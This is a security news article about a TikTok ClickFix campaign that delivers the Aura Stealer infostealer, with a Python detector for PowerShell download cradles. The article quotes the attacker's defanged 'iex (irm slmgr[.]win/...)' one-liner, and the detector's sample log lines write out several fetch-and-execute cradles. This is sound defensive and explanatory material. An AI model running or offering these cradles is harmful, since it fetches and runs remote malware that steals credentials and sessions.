TikTok ClickFix Attacks Spread Aura Stealer Malware Through Fake Software Activation Videos

A growing threat is spreading through one of the most popular social platforms in the world: TikTok. According to new research, cybercriminals are using TikTok videos disguised as free activation guides for paid software such as Windows, Microsoft 365, Spotify, Adobe Photoshop, and Netflix to distribute information-stealing malware via the ClickFix social-engineering technique.

Xavier Mertens, a handler at the SANS Internet Storm Center (ISC), identified the ongoing campaign, which mirrors a similar one documented by Trend Micro earlier this year. The videos promise free activation or "fixes" for paid software and trick viewers into running a malicious PowerShell command that silently infects their systems.

How the ClickFix attack works
ClickFix is a social-engineering technique that persuades the victim to type or paste a command into a console themselves, so no exploit or booby-trapped download is needed. In the malicious TikTok videos, the attackers display a short PowerShell command on-screen and instruct viewers to run it as an administrator, supposedly to activate a legitimate program. The command typically follows this format:

iex (irm slmgr[.]win/photoshop)

The path of the URL changes with the software being impersonated: fake Windows activation videos use "windows" instead of "photoshop", so the server can tell which lure brought the victim in. The one-liner chains two PowerShell aliases: irm is Invoke-RestMethod, which fetches the response body from the remote domain (slmgr[.]win), and iex is Invoke-Expression, which runs that text as PowerShell code. The second-stage script is therefore executed straight from memory and is never saved to disk as a file, which is exactly why the technique sidesteps defenses that only inspect downloaded files.
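The defender's side of the one-liner above is spotting it in PowerShell script block logs (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational channel). The following detector is an added example written for this article, not code from the ISC or Trend Micro research: it normalises the common aliases (iex, irm, iwr, curl, wget) to their full cmdlet names, flags any block where a downloader feeds Invoke-Expression, and pulls out the contacted host and the lure name from the URL path. The log lines are constructed for the example; only the slmgr[.]win cradle shape comes from the page.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of 4104 script-block text fields. Lines 3-5 are download
# cradles; the others use the same cmdlets legitimately and must not fire.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "irm https://api.github.com/repos/PowerShell/PowerShell/releases/latest | Select-Object tag_name",
    "iex (irm slmgr.win/photoshop)",
    "IEX (New-Object Net.WebClient).DownloadString('http://slmgr.win/windows')",
    "Invoke-Expression (Invoke-WebRequest -Uri 'https://example.org/setup' -UseBasicParsing).Content",
    "$x = Invoke-RestMethod https://updates.example.com/status; Write-Output $x",
]

# PowerShell resolves these aliases at run time, so a rule that only looks for
# the full cmdlet name misses the exact string shown in the videos.
ALIASES = {
    r"\biex\b": "Invoke-Expression",
    r"\birm\b": "Invoke-RestMethod",
    r"\biwr\b": "Invoke-WebRequest",
    r"\bcurl\b": "Invoke-WebRequest",
    r"\bwget\b": "Invoke-WebRequest",
}

# Ways of pulling remote text into the process; any of them plus
# Invoke-Expression is a download cradle.
DOWNLOADERS = ("Invoke-RestMethod", "Invoke-WebRequest", "DownloadString", "DownloadData")

# Scheme is optional because the lure omits it ("slmgr.win/photoshop").
URL_RE = re.compile(r"""(https?://)?([a-z0-9.-]+\.[a-z]{2,})(/[^\s'")]*)?""", re.I)


@dataclass
class Finding:
    block: str
    downloader: str
    host: str
    lure: str  # first path segment, i.e. the impersonated product


def normalise(block: str) -> str:
    """Expand known aliases so one rule covers every spelling."""
    text = block
    for pattern, cmdlet in ALIASES.items():
        text = re.sub(pattern, cmdlet, text, flags=re.I)
    return text


def extract_target(text: str) -> Tuple[str, str]:
    """Return (host, first path segment) of the first real URL in the block.

    A dotted .NET type such as Net.WebClient also looks like a host, so a
    candidate without a scheme is only accepted when it carries a path.
    """
    for m in URL_RE.finditer(text):
        scheme, host, path = m.group(1), m.group(2), m.group(3) or ""
        if scheme or path:
            lure = path.strip("/").split("/")[0] if path else ""
            return host.lower(), lure
    return "", ""


def is_download_cradle(block: str) -> Optional[Finding]:
    """Flag a script block where remote content is handed to Invoke-Expression."""
    text = normalise(block)
    if not re.search(r"invoke-expression", text, re.I):
        return None
    used = [d for d in DOWNLOADERS if re.search(re.escape(d), text, re.I)]
    if not used:
        return None
    host, lure = extract_target(text)
    return Finding(block=block, downloader=used[0], host=host, lure=lure)


def scan(blocks: List[str]) -> List[Finding]:
    """Run the rule over a batch of 4104 text fields and keep the hits."""
    return [f for f in (is_download_cradle(b) for b in blocks) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"{f.downloader:<18} host={f.host:<20} lure={f.lure or '-':<10} {f.block}")
```

The rule deliberately keys on the structure (downloader output into Invoke-Expression) rather than on slmgr[.]win, because the domain is the cheapest thing for the attacker to change; the extracted host and lure are there for triage and for pivoting to DNS and proxy logs. Script block logging must be enabled for these events to exist at all, and a longer second-stage script may be split across several 4104 records, so the detector is meant for the short first-stage one-liner.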

The malware behind the campaign
That second-stage PowerShell script retrieves two executable files hosted on Cloudflare Pages. The first, updater.exe, has been confirmed as a variant of Aura Stealer, a known infostealer. Once running, Aura Stealer harvests sensitive data, including browser-stored passwords, cookies, authentication tokens, and cryptocurrency wallets, and exfiltrates it to attacker-controlled servers. Stolen cookies and tokens are the most dangerous part of that haul: they let the attackers hijack live sessions without ever entering a password.

The second file, source.exe, uses the C# compiler that ships with the .NET Framework (csc.exe) to compile additional code at run time and inject it directly into memory, so the final payload never exists as a ready-made binary on disk. Its exact purpose remains unclear; the researchers suggest it could provide persistence or deploy a secondary payload.

A widespread and growing trend
ClickFix-based malware distribution is becoming a popular technique among threat actors, including those running ransomware and crypto-theft operations. By placing the lure on social media platforms like TikTok, attackers borrow the trust and reach of short-form video to put a malicious command in front of non-technical audiences who would never open a suspicious attachment.

Mertens and other security practitioners warn users never to copy and run commands from online videos or forums, whether in PowerShell, the macOS Terminal, or a Linux shell. A single line of code is enough to hand full control of a system to an attacker, and no legitimate activation process requires it.

Conclusion
The resurgence of ClickFix attacks on TikTok shows how far social engineering has displaced technical exploits in the modern malware landscape. With platforms like TikTok serving as distribution hubs for Aura Stealer and other infostealers, users must stay skeptical of any "free activation" that asks them to run a command. Basic cyber hygiene, including avoiding pirated-software content, obtaining software only from its vendor, and keeping antivirus protection up to date, remains the strongest defense against this growing threat.
